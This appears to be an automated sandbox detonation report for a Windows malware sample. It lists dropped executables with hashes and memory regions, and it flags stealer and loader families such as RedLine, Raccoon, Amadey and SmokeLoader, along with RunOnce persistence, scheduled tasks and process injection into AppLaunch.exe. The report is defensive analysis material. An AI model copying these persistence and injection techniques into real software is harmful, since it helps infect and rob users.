C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2sA143dW.exe

MD5 03875b6a92cc34e07d66d778c49723c9
SHA1 4ed6f143de7a8533eadb89df81ff8be011adc6a0
SHA256 debd7833fc2657b4da903739cccc5972633bee4243d386fff26c6d7aad86c670
SHA512 960ecd13c324b826982d8fa2a4bb45f3731f05f3c92474135ca5be3d901bc4d8747417c69fb94a6abde7e5463f3c7276026c2e74fb17dd1b0edab704b7927bf7

\Users\Admin\AppData\Local\Temp\IXP004.TMP\2sA143dW.exe

MD5 03875b6a92cc34e07d66d778c49723c9
SHA1 4ed6f143de7a8533eadb89df81ff8be011adc6a0
SHA256 debd7833fc2657b4da903739cccc5972633bee4243d386fff26c6d7aad86c670
SHA512 960ecd13c324b826982d8fa2a4bb45f3731f05f3c92474135ca5be3d901bc4d8747417c69fb94a6abde7e5463f3c7276026c2e74fb17dd1b0edab704b7927bf7

C:\Users\Admin\AppData\Local\Temp\FEBF.exe

MD5 329bce2e07f7898910e3fd4e17b98d42
SHA1 94d379a5964c97eefad6432608dd09b4ddb12b77
SHA256 3c78b3067a13c0c8980f0cc9cac0c8d5a2ac8400c259405eebb907f3f7da349e
SHA512 a3eaf12d4d6fffbae622ba50afef0eba19b24f25d3f6706abb5b4e8d7c05e3b0da6b2a4f0a0daa48d026ef4fc8205746cad90daff2d2a47edc7a90446649e7f2

memory/532-130-0x0000000000810000-0x000000000084E000-memory.dmp

memory/2440-131-0x0000000073DA0000-0x000000007448E000-memory.dmp

memory/796-132-0x0000000073DA0000-0x000000007448E000-memory.dmp

memory/2032-133-0x0000000073DA0000-0x000000007448E000-memory.dmp

memory/2032-134-0x0000000007110000-0x0000000007150000-memory.dmp

memory/2440-135-0x0000000004B50000-0x0000000004B90000-memory.dmp

memory/2032-136-0x0000000000400000-0x000000000047E000-memory.dmp

memory/796-137-0x0000000073DA0000-0x000000007448E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\458F.exe

MD5 a0ec83b955c8a65f5ecce0e8e7be6f57
SHA1 bb64ddfdf3d03160ff2622ababc021296773f6fa
SHA256 15ac76fbfa706eba90fa943d3417ef3de45bf8d21c1f77bd4dd6ebfbfb87d621
SHA512 06989db3d2a187d70e70bcb8c1deb7d053ac61125dcc17380beda2068a9351ce721f7da1f64bff79ed8b7c1a7ec15daa39dd98629a2e7dbf9c762f38e707150e

C:\Users\Admin\AppData\Local\Temp\458F.exe

MD5 a0ec83b955c8a65f5ecce0e8e7be6f57
SHA1 bb64ddfdf3d03160ff2622ababc021296773f6fa
SHA256 15ac76fbfa706eba90fa943d3417ef3de45bf8d21c1f77bd4dd6ebfbfb87d621
SHA512 06989db3d2a187d70e70bcb8c1deb7d053ac61125dcc17380beda2068a9351ce721f7da1f64bff79ed8b7c1a7ec15daa39dd98629a2e7dbf9c762f38e707150e

memory/2920-143-0x0000000073DA0000-0x000000007448E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\483F.exe

MD5 395e28e36c665acf5f85f7c4c6363296
SHA1 cd96607e18326979de9de8d6f5bab2d4b176f9fb
SHA256 46af9af74a5525e6315bf690c664a1ad46452fef15b7f3aecb6216ad448befaa
SHA512 3d22e98b356986af498ea2937aa388aeb1ac6edfeca784aae7f6628a029287c3daebcc6ab5f8e0ef7f9d546397c8fd406a8cdaf0b46dcc4f8716a69d6fb873de

memory/2920-144-0x00000000010B0000-0x00000000021E8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\483F.exe

MD5 395e28e36c665acf5f85f7c4c6363296
SHA1 cd96607e18326979de9de8d6f5bab2d4b176f9fb
SHA256 46af9af74a5525e6315bf690c664a1ad46452fef15b7f3aecb6216ad448befaa
SHA512 3d22e98b356986af498ea2937aa388aeb1ac6edfeca784aae7f6628a029287c3daebcc6ab5f8e0ef7f9d546397c8fd406a8cdaf0b46dcc4f8716a69d6fb873de

C:\Users\Admin\AppData\Local\Temp\4A62.exe

MD5 8e4c82c39fdb3c524a81f62ded2d6c2e
SHA1 bde413f720af010f5c9d8f745d79be00c0fd3c1e
SHA256 be534d74fab71aae643e680faf16cc0d6150f8653afe3c7fc9f949ca7f2e48e7
SHA512 c88868cdc8f6c66e5fe0c1073ae394a03a20f5530de057e5fb604fef25754bf1bd26e70eba67b7cd610e50313bfc8190adb684b084b6d0dc1ac833a06d35edb2

C:\Users\Admin\AppData\Local\Temp\4A62.exe

MD5 8e4c82c39fdb3c524a81f62ded2d6c2e
SHA1 bde413f720af010f5c9d8f745d79be00c0fd3c1e
SHA256 be534d74fab71aae643e680faf16cc0d6150f8653afe3c7fc9f949ca7f2e48e7
SHA512 c88868cdc8f6c66e5fe0c1073ae394a03a20f5530de057e5fb604fef25754bf1bd26e70eba67b7cd610e50313bfc8190adb684b084b6d0dc1ac833a06d35edb2

\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 6a085a5ce478080d06a5035eaee7d97c
SHA1 75e774ca09a447b2836a14c9fe5e4d88a4ac37cb
SHA256 4d8d88228d68177f05233f9355fa8b25cee3a9bbcc96b47eeb9f12ec5c828457
SHA512 308d05358754432778f38a00097f2f2b0c085a9eabfe9621d36d46c41b76d54a5c3d54b0c3f194b1ce970d74c8138cad6d7ee57236a5e9ba1b055bbce670b366

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 6a085a5ce478080d06a5035eaee7d97c
SHA1 75e774ca09a447b2836a14c9fe5e4d88a4ac37cb
SHA256 4d8d88228d68177f05233f9355fa8b25cee3a9bbcc96b47eeb9f12ec5c828457
SHA512 308d05358754432778f38a00097f2f2b0c085a9eabfe9621d36d46c41b76d54a5c3d54b0c3f194b1ce970d74c8138cad6d7ee57236a5e9ba1b055bbce670b366

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 6a085a5ce478080d06a5035eaee7d97c
SHA1 75e774ca09a447b2836a14c9fe5e4d88a4ac37cb
SHA256 4d8d88228d68177f05233f9355fa8b25cee3a9bbcc96b47eeb9f12ec5c828457
SHA512 308d05358754432778f38a00097f2f2b0c085a9eabfe9621d36d46c41b76d54a5c3d54b0c3f194b1ce970d74c8138cad6d7ee57236a5e9ba1b055bbce670b366

\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 6a085a5ce478080d06a5035eaee7d97c
SHA1 75e774ca09a447b2836a14c9fe5e4d88a4ac37cb
SHA256 4d8d88228d68177f05233f9355fa8b25cee3a9bbcc96b47eeb9f12ec5c828457
SHA512 308d05358754432778f38a00097f2f2b0c085a9eabfe9621d36d46c41b76d54a5c3d54b0c3f194b1ce970d74c8138cad6d7ee57236a5e9ba1b055bbce670b366

memory/2116-169-0x00000000002C0000-0x000000000031A000-memory.dmp

memory/2116-170-0x0000000000400000-0x000000000047E000-memory.dmp

memory/1020-178-0x0000000000220000-0x0000000000229000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\4A62.exe

MD5 8e4c82c39fdb3c524a81f62ded2d6c2e
SHA1 bde413f720af010f5c9d8f745d79be00c0fd3c1e
SHA256 be534d74fab71aae643e680faf16cc0d6150f8653afe3c7fc9f949ca7f2e48e7
SHA512 c88868cdc8f6c66e5fe0c1073ae394a03a20f5530de057e5fb604fef25754bf1bd26e70eba67b7cd610e50313bfc8190adb684b084b6d0dc1ac833a06d35edb2

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 6a085a5ce478080d06a5035eaee7d97c
SHA1 75e774ca09a447b2836a14c9fe5e4d88a4ac37cb
SHA256 4d8d88228d68177f05233f9355fa8b25cee3a9bbcc96b47eeb9f12ec5c828457
SHA512 308d05358754432778f38a00097f2f2b0c085a9eabfe9621d36d46c41b76d54a5c3d54b0c3f194b1ce970d74c8138cad6d7ee57236a5e9ba1b055bbce670b366

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 498af485852079b7064dd1675377809f
SHA1 a6a36a996b5f1d2dab2eb4232f65275cb1df4030
SHA256 e56a79a9de6b1e161d5cb6969bd056062565f2525800b38f205bd41eb45bd0f6
SHA512 04c5e5cebf49162b6947172d1409ba8e419e39260aed3832b39e1846b9fd2dcb06590983f2b067f5601b8006bf79d7973df47d2776de5f33621ddc945f98e344

memory/2000-188-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 498af485852079b7064dd1675377809f
SHA1 a6a36a996b5f1d2dab2eb4232f65275cb1df4030
SHA256 e56a79a9de6b1e161d5cb6969bd056062565f2525800b38f205bd41eb45bd0f6
SHA512 04c5e5cebf49162b6947172d1409ba8e419e39260aed3832b39e1846b9fd2dcb06590983f2b067f5601b8006bf79d7973df47d2776de5f33621ddc945f98e344

memory/2000-192-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 6a085a5ce478080d06a5035eaee7d97c
SHA1 75e774ca09a447b2836a14c9fe5e4d88a4ac37cb
SHA256 4d8d88228d68177f05233f9355fa8b25cee3a9bbcc96b47eeb9f12ec5c828457
SHA512 308d05358754432778f38a00097f2f2b0c085a9eabfe9621d36d46c41b76d54a5c3d54b0c3f194b1ce970d74c8138cad6d7ee57236a5e9ba1b055bbce670b366

memory/2440-195-0x0000000073DA0000-0x000000007448E000-memory.dmp

memory/2000-196-0x0000000000400000-0x0000000000409000-memory.dmp

memory/872-191-0x0000000002550000-0x0000000002948000-memory.dmp

memory/2032-197-0x0000000073DA0000-0x000000007448E000-memory.dmp

memory/2440-199-0x0000000004B50000-0x0000000004B90000-memory.dmp

memory/2032-198-0x0000000007110000-0x0000000007150000-memory.dmp

\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 498af485852079b7064dd1675377809f
SHA1 a6a36a996b5f1d2dab2eb4232f65275cb1df4030
SHA256 e56a79a9de6b1e161d5cb6969bd056062565f2525800b38f205bd41eb45bd0f6
SHA512 04c5e5cebf49162b6947172d1409ba8e419e39260aed3832b39e1846b9fd2dcb06590983f2b067f5601b8006bf79d7973df47d2776de5f33621ddc945f98e344

\Users\Admin\AppData\Local\Temp\setup.exe

MD5 cac360e5fb18e8f135b7008cb478e15a
SHA1 37e4f9b25237b12ab283fc70bf89242ab3b83875
SHA256 e8689f69dd3d0a3bd5f6e4b3a85251583c4b3b1dbf03e0c30c6cf0048e6532f8
SHA512 7f0bd6103dd802de4a4665b460c8c178f32e6075094532ec43c83fc1d8595d9495772bf191669f4b72cc2d78f91b06e046a11bbd0ef935b040eeb31e741d2a32

\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 498af485852079b7064dd1675377809f
SHA1 a6a36a996b5f1d2dab2eb4232f65275cb1df4030
SHA256 e56a79a9de6b1e161d5cb6969bd056062565f2525800b38f205bd41eb45bd0f6
SHA512 04c5e5cebf49162b6947172d1409ba8e419e39260aed3832b39e1846b9fd2dcb06590983f2b067f5601b8006bf79d7973df47d2776de5f33621ddc945f98e344

memory/872-202-0x0000000002550000-0x0000000002948000-memory.dmp

\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 6a085a5ce478080d06a5035eaee7d97c
SHA1 75e774ca09a447b2836a14c9fe5e4d88a4ac37cb
SHA256 4d8d88228d68177f05233f9355fa8b25cee3a9bbcc96b47eeb9f12ec5c828457
SHA512 308d05358754432778f38a00097f2f2b0c085a9eabfe9621d36d46c41b76d54a5c3d54b0c3f194b1ce970d74c8138cad6d7ee57236a5e9ba1b055bbce670b366

memory/872-203-0x0000000002950000-0x000000000323B000-memory.dmp

memory/1020-176-0x0000000000590000-0x0000000000690000-memory.dmp

memory/872-209-0x0000000000400000-0x0000000000D1B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\5932.exe

MD5 e2ff8a34d2fcc417c41c822e4f3ea271
SHA1 926eaf9dd645e164e9f06ddcba567568b3b8bb1b
SHA256 4f26511d40ad3d781ff1bd4c643f9418b3fd0c4da6b769a1ff9ae4d07d8892d0
SHA512 823d99704b761218b3de8f6b107378b529e7f718557b9e2b57ffb497310c4eccfc35c402bad28cdc2758ef254e55a936949c24468f07fc21e7e3efc0671beec2

memory/2920-210-0x0000000073DA0000-0x000000007448E000-memory.dmp

memory/2760-211-0x0000000073DA0000-0x000000007448E000-memory.dmp

memory/2760-212-0x00000000012E0000-0x00000000016C0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\5932.exe

MD5 e2ff8a34d2fcc417c41c822e4f3ea271
SHA1 926eaf9dd645e164e9f06ddcba567568b3b8bb1b
SHA256 4f26511d40ad3d781ff1bd4c643f9418b3fd0c4da6b769a1ff9ae4d07d8892d0
SHA512 823d99704b761218b3de8f6b107378b529e7f718557b9e2b57ffb497310c4eccfc35c402bad28cdc2758ef254e55a936949c24468f07fc21e7e3efc0671beec2

C:\Users\Admin\AppData\Local\Temp\setup.exe

MD5 cac360e5fb18e8f135b7008cb478e15a
SHA1 37e4f9b25237b12ab283fc70bf89242ab3b83875
SHA256 e8689f69dd3d0a3bd5f6e4b3a85251583c4b3b1dbf03e0c30c6cf0048e6532f8
SHA512 7f0bd6103dd802de4a4665b460c8c178f32e6075094532ec43c83fc1d8595d9495772bf191669f4b72cc2d78f91b06e046a11bbd0ef935b040eeb31e741d2a32

C:\Users\Admin\AppData\Local\Temp\setup.exe

MD5 cac360e5fb18e8f135b7008cb478e15a
SHA1 37e4f9b25237b12ab283fc70bf89242ab3b83875
SHA256 e8689f69dd3d0a3bd5f6e4b3a85251583c4b3b1dbf03e0c30c6cf0048e6532f8
SHA512 7f0bd6103dd802de4a4665b460c8c178f32e6075094532ec43c83fc1d8595d9495772bf191669f4b72cc2d78f91b06e046a11bbd0ef935b040eeb31e741d2a32

\Users\Admin\AppData\Local\Temp\kos4.exe

MD5 01707599b37b1216e43e84ae1f0d8c03
SHA1 521fe10ac55a1f89eba7b8e82e49407b02b0dcb2
SHA256 cc0dbc1d31ccd9488695b690bd7e7aa4a90ba4b2a5d23ef48b296465f5aa44dd
SHA512 9f9ff29a12d26a7d42656e0faf970c908f1ef428b14e5a5fe7acd06371b96b16eb984e8fbee4e2b906c6db7fb39c9d4a221e79fc3d5e9ca9b59e377875bc5642

\Users\Admin\AppData\Local\Temp\setup.exe

MD5 cac360e5fb18e8f135b7008cb478e15a
SHA1 37e4f9b25237b12ab283fc70bf89242ab3b83875
SHA256 e8689f69dd3d0a3bd5f6e4b3a85251583c4b3b1dbf03e0c30c6cf0048e6532f8
SHA512 7f0bd6103dd802de4a4665b460c8c178f32e6075094532ec43c83fc1d8595d9495772bf191669f4b72cc2d78f91b06e046a11bbd0ef935b040eeb31e741d2a32

\Users\Admin\AppData\Local\Temp\setup.exe

MD5 cac360e5fb18e8f135b7008cb478e15a
SHA1 37e4f9b25237b12ab283fc70bf89242ab3b83875
SHA256 e8689f69dd3d0a3bd5f6e4b3a85251583c4b3b1dbf03e0c30c6cf0048e6532f8
SHA512 7f0bd6103dd802de4a4665b460c8c178f32e6075094532ec43c83fc1d8595d9495772bf191669f4b72cc2d78f91b06e046a11bbd0ef935b040eeb31e741d2a32

\Users\Admin\AppData\Local\Temp\setup.exe

MD5 cac360e5fb18e8f135b7008cb478e15a
SHA1 37e4f9b25237b12ab283fc70bf89242ab3b83875
SHA256 e8689f69dd3d0a3bd5f6e4b3a85251583c4b3b1dbf03e0c30c6cf0048e6532f8
SHA512 7f0bd6103dd802de4a4665b460c8c178f32e6075094532ec43c83fc1d8595d9495772bf191669f4b72cc2d78f91b06e046a11bbd0ef935b040eeb31e741d2a32

memory/2920-230-0x0000000073DA0000-0x000000007448E000-memory.dmp

memory/1380-232-0x0000000003D00000-0x0000000003D16000-memory.dmp

memory/988-231-0x0000000000250000-0x0000000000258000-memory.dmp

memory/2000-233-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS5BD6.tmp\Install.exe

MD5 6a77181784bc9e5a81ed1479bcee7483
SHA1 f7bc21872e7016a4945017c5ab9b922b44a22ece
SHA256 38bab577cf37ed54d75c3c16cfa5c0c76391b3c27e9e9c86ee547f156679f2a7
SHA512 e6c888730aa28a8889fe0c96be0c19aad4a5136e8d5a3845ca8a835eb85d5dba1b644c6c18913d56d516ce02a81cd875c03b85b0e1e41ef8fd32fd710665332f

memory/2760-244-0x00000000002D0000-0x00000000002DA000-memory.dmp

memory/2760-245-0x00000000002E0000-0x00000000002E8000-memory.dmp

memory/1972-246-0x0000000010000000-0x000000001057B000-memory.dmp

memory/2760-249-0x0000000005180000-0x0000000005312000-memory.dmp

memory/2760-253-0x0000000000690000-0x00000000006A0000-memory.dmp

memory/1708-254-0x0000000000400000-0x000000000041B000-memory.dmp

memory/1708-255-0x0000000000400000-0x000000000041B000-memory.dmp

memory/1708-257-0x0000000000400000-0x000000000041B000-memory.dmp

memory/1708-260-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1708-256-0x0000000000400000-0x000000000041B000-memory.dmp

memory/1708-263-0x0000000000400000-0x000000000041B000-memory.dmp

memory/1708-266-0x0000000000400000-0x000000000041B000-memory.dmp

memory/2760-269-0x0000000005149000-0x000000000514D000-memory.dmp

memory/2760-271-0x0000000005850000-0x0000000005889000-memory.dmp

memory/1708-270-0x0000000000400000-0x000000000041B000-memory.dmp

memory/2760-267-0x0000000073DA0000-0x000000007448E000-memory.dmp

memory/988-272-0x000007FEF52E0000-0x000007FEF5CCC000-memory.dmp

memory/872-273-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/832-274-0x000000013F930000-0x000000013FED1000-memory.dmp

memory/1972-276-0x00000000012D0000-0x00000000019BF000-memory.dmp

memory/872-277-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/2156-278-0x00000000020A0000-0x000000000278F000-memory.dmp

memory/988-283-0x000000001B540000-0x000000001B5C0000-memory.dmp

memory/1972-285-0x00000000012D0000-0x00000000019BF000-memory.dmp

memory/1972-284-0x00000000012D0000-0x00000000019BF000-memory.dmp

memory/1972-282-0x0000000000BE0000-0x00000000012CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabBBF1.tmp

MD5 f3441b8572aae8801c04f3060b550443
SHA1 4ef0a35436125d6821831ef36c28ffaf196cda15
SHA256 6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf
SHA512 5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

C:\Users\Admin\AppData\Local\Temp\TarC317.tmp

MD5 9441737383d21192400eca82fda910ec
SHA1 725e0d606a4fc9ba44aa8ffde65bed15e65367e4
SHA256 bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5
SHA512 7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 80c85e1c0cfc18f906fb2cf347b46155
SHA1 c52a434a4e304a20f538e6665a2a7593b0dcdad6
SHA256 0a127642fb3404ff210eaf774a9bc9ff28e8a8a7ab68706733a5d67a3eb1bb6b
SHA512 158bd25826fb86d0b174db8ae1c766b4db3623a4fbd7d391e3ed50ef798b82a563625fa60078c6c85896261896621096bfcf11591a1ff7fcd21a6dec0a7b7c56

memory/872-338-0x0000000002550000-0x0000000002948000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c3392585525e2b1d270716563c496ef0
SHA1 730355852f214c765016b689d03fd9726bf6665b
SHA256 5efb0b63455012051434eb792c021636bcb45da0bbffc3c6c16936e38cb6f4ba
SHA512 297acadf11ba2f9f7deb23cc59e282ee3fed6a24d1f6438c52ef4f429dc93bcb4da427179aad0a6e4c8217c1c6285b06d899d8cd01e6317afd449fff6f759604

memory/872-371-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/2032-381-0x0000000073DA0000-0x000000007448E000-memory.dmp

memory/872-384-0x0000000002950000-0x000000000323B000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 720110baf7e897039504ec771c117171
SHA1 7c72ea5eb4f1735a9e02ce717c1d1fe305444625
SHA256 b0c0afc2df01078f1c6d68dc13328433b1f1cc8117fb48ac6a423a59b10cbef4
SHA512 e62d0e735e6ed5b5bc2c552a3e854af207229a92ac2237516f0778cacb8d5bb01f7689810a7b3d46d671d9cd393ae6c1c494e0ae09a2f95679b9c8cede650564

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll

MD5 a5b509a3fb95cc3c8d89cd39fc2a30fb
SHA1 5aff4266a9c0f2af440f28aa865cebc5ddb9cd5c
SHA256 5f3c80056c7b1104c15d6fee49dac07e665c6ffd0795ad486803641ed619c529
SHA512 3cc58d989c461a04f29acbfe03ed05f970b3b3e97e6819962fc5c853f55bce7f7aba0544a712e3a45ee52ab31943c898f6b3684d755b590e3e961ae5ecd1edb9

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

MD5 e913b0d252d36f7c9b71268df4f634fb
SHA1 5ac70d8793712bcd8ede477071146bbb42d3f018
SHA256 4cf5b584cf79ac523f645807a65bc153fbeaa564c0e1acb4dac9004fc9d038da
SHA512 3ea08f0897c1b7b5859961351eef59840bbf319a6ad7ebe1c9e1b5e2ce25588d7b1a37fd6c5417653521fc73f1f42eb043d0ee6fcd645aa92b8f305d726273b4

memory/2344-431-0x000007FEEDEE0000-0x000007FEEE87D000-memory.dmp

memory/2344-434-0x00000000024E0000-0x0000000002560000-memory.dmp

memory/2344-433-0x000007FEEDEE0000-0x000007FEEE87D000-memory.dmp

memory/988-435-0x000007FEF52E0000-0x000007FEF5CCC000-memory.dmp

memory/1972-437-0x00000000012D0000-0x00000000019BF000-memory.dmp

memory/2344-438-0x00000000024E0000-0x0000000002560000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c2dd4406c43fbfcf8502d0b79dbbb6c1
SHA1 556e5e257ff27b269e289b998a0764e56468a3f8
SHA256 09eae9d540172c5f0f0ff2d6acd3526b4444e5da21edcacfa03c5f9abe570d85
SHA512 3c156ad3113d182e1884e028fa42e0add4964be6407aa803392defda326104ded2e2bbcbecd260ca81e94cb8f0831a8822700d7020e57d2668c6d5abb62e6c2e

memory/2156-473-0x00000000020A0000-0x000000000278F000-memory.dmp

memory/988-474-0x000000001B540000-0x000000001B5C0000-memory.dmp

memory/1972-475-0x00000000012D0000-0x00000000019BF000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\31MRGZC5UC8AAC874HHH.temp

MD5 eb069299631d9ea5f136ee072d0674c0
SHA1 c3f36cc95b321d53d244181c091d55a32b8b58ef
SHA256 beff3b2f55181f2e3a78912950cddf043744c17ea558634db48e7d4c37acf8e1
SHA512 bf1f386e1c79de2f6cae627eab52506b80bf85e249fb8a840c412a8a321d9421f15a3bbb5a27b7b558c52e899502ac8d43ec633cb8a2a7a089d5e7b23a4e189b

memory/1972-480-0x00000000012D0000-0x00000000019BF000-memory.dmp

memory/1476-484-0x00000000023B0000-0x0000000002430000-memory.dmp

memory/1476-483-0x000007FEEDEE0000-0x000007FEEE87D000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 308caa2b213ab55e8cdad2b792dcf64c
SHA1 1efcaa8dd2fb135009d59d052826d8e1ba01fd8e
SHA256 93b3a48c462630e4f3f22461097fb94378a792575813ebce9c0c6385798b8e3d
SHA512 69290eabf82241fe1056b7c06ece70f8ff851a5fb5c031c088a6040d1417f29680b351f0e01ce407276a4fefae230786ecb070dff864ee16cc27f1b0a58022b6

memory/1476-519-0x000000001B130000-0x000000001B412000-memory.dmp

memory/1476-531-0x0000000002320000-0x0000000002328000-memory.dmp

memory/2344-532-0x00000000024E0000-0x0000000002560000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015


Analysis: behavioral2

Detonation Overview

Submitted

2023-10-26 06:36

Reported

2023-10-26 06:38

Platform

win10v2004-20231023-en

Max time kernel

26s

Max time network

132s

Command Line

"C:\Users\Admin\AppData\Local\Temp\f66b2258a70968303673ee418b5d5307.exe"

Signatures

Amadey

trojan amadey

Detect ZGRat V1

Glupteba

loader dropper glupteba

Glupteba payload

Raccoon

stealer raccoon

Raccoon Stealer payload

RedLine

infostealer redline

RedLine payload

SmokeLoader

trojan backdoor smokeloader

ZGRat

rat zgrat

Downloads MZ/PE file

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ni8Zb1nN.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ZJ3VJ7hO.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\27C7.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ro3WO0Cp.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dW9uy8Yx.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2032 set thread context of 2584 N/A C:\Users\Admin\AppData\Local\Temp\f66b2258a70968303673ee418b5d5307.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Wanugegulaho milorahaxah mosuraxupib rusekutokefod bopujune C:\Users\Admin\AppData\Local\Temp\2E26.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2032 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\f66b2258a70968303673ee418b5d5307.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2032 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\f66b2258a70968303673ee418b5d5307.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2032 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\f66b2258a70968303673ee418b5d5307.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
